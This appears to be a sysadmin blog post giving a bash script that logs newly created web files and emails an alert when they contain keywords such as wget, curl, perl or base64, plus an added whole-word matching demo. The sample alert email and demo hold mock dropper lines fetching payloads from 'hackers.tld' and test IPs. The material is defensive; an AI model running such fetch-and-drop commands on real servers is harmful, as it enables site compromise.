20131020

Detect New Files and Send Notification if Suspicious

This post requires FSniper installed and running on your box. Please see the following post: FSniper – Monitor Newly Created Files in Directory. This is similar to the popular paid product ConfigServer eXploit Scanner (cxs), which also uses the inotify functionality that has been in the kernel since 2.6.13.
I am using FSniper to check for and detect new files and let its handler trigger the following script. The script logs every new file captured by FSniper to /var/www/html/new_files.txt (so I can browse the list in a web browser at http://yourwebsite.com/new_files.txt) and then notifies me whenever it finds any of the following suspicious words inside the file:

wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64


#!/bin/bash
# FSniper handler: $1 is the path of the newly created file
file="$1"
[ -f "$file" ] || exit 0

output_file='/var/www/html/new_files.txt'
user_owner=$(stat -c %U "$file")
ip=$(hostname -i)
subject='Found something suspicious'
emailto='youremail@domain.tld'
message=$(mktemp /tmp/emailmessage.XXXXXX)

# log every new file as: date time >> path | owner
echo "$(date +"%Y-%m-%d") $(date +%k:%M) >> $file | $user_owner" >> "$output_file"

# number of lines containing any of the suspicious words (case-insensitive)
danger=$(grep -Eic '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' "$file")

if [ "$danger" -gt 0 ]; then
  echo "Server: $(hostname)" > "$message"
  # -H prefixes each matching line with the file name, as shown in the email below
  grep -EiH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' "$file" >> "$message"
  mail -s "$ip | $subject" "$emailto" < "$message"
fi
rm -f "$message"
The email you receive will look similar to this:
From: root
To: youremail@domain.tld
Subject: 192.168.1.1 | Found something suspicious
Email Body:
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts
This helps you monitor new files and makes sure you are the first to know when a new file contains unwanted words. You can modify the script to suit your needs.
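One thing worth modifying is the match itself: the keyword list contains very short entries such as sh and cd, and the plain substring match in the script above fires on every line containing "shell" or "CDN". The following added example (my own shell code, not the original post's script) runs the same keyword list as a whole-word match and writes the same "Server: ..." report body the post's script mails. The two sample files, their contents, the 192.0.2.x / 198.51.100.x addresses and the report_file helper are all constructed for the example and are not from the post.

```shell
#!/bin/sh
# Added example: whole-word version of the post's suspicious-word check.
# Not the original handler; file names, addresses and the report format
# below are constructed for the demo.

# The post's keyword list, unchanged.
PATTERN='(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)'

# Original behaviour: count lines where any keyword appears as a substring.
# "shell" trips on "sh" and "CDN" trips on "cd", so this over-reports.
count_hits_naive() {
    grep -Eic "$PATTERN" "$1"
}

# Whole-word variant (-w): a keyword only counts when it is delimited by
# non-word characters, e.g. `wget http://...` but not `shell`.
# Prints matching lines as file:line; exit 0 if any, 1 if none, 2 if unreadable.
scan_file() {
    [ -f "$1" ] && [ -r "$1" ] || return 2
    grep -EiwH "$PATTERN" "$1"
}

# Number of whole-word hits in one file (always prints a number).
count_hits() {
    scan_file "$1" | wc -l | tr -d ' '
}

# Build the email body the post's script sends: "Server: <host>" followed by
# the matching lines. Returns 0 when there is something to mail, 1 otherwise,
# so a handler can do:  report_file "$new" "$msg" && mail -s "..." "$to" < "$msg"
report_file() {
    _hits=$(scan_file "$1") || return 1
    { printf 'Server: %s\n' "$(uname -n)"; printf '%s\n' "$_hits"; } > "$2"
}

# Two constructed sample files: one that should alert, one that should not.
make_samples() {
    _dir=$(mktemp -d)
    cat > "$_dir/dropper.php" <<'EOF'
<?php
system("wget http://192.0.2.10/bad_thing.php -O /tmp/x");
$next = "curl http://198.51.100.7/scripts";
EOF
    cat > "$_dir/index.html" <<'EOF'
<p>Welcome to the shell fishing CDN page.</p>
EOF
    printf '%s\n' "$_dir"
}

# Demo run: substring vs whole-word counts for both files, then clean up.
demo_dir=$(make_samples)
for f in "$demo_dir/dropper.php" "$demo_dir/index.html"; do
    printf '%s: substring=%s whole-word=%s\n' \
        "$f" "$(count_hits_naive "$f")" "$(count_hits "$f")"
done
rm -rf "$demo_dir"
```

On the sample files the substring match reports index.html as suspicious while the whole-word match does not; dropper.php is reported by both. Note the trade-off: grep -w treats the underscore as a word character, so a call such as base64_decode( would no longer match base64 as a whole word; if you rely on that keyword, match it separately without -w.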


Source: http://blog.secaserver.com/2011/06/detect-new-files-and-send-notification-if-suspicious/
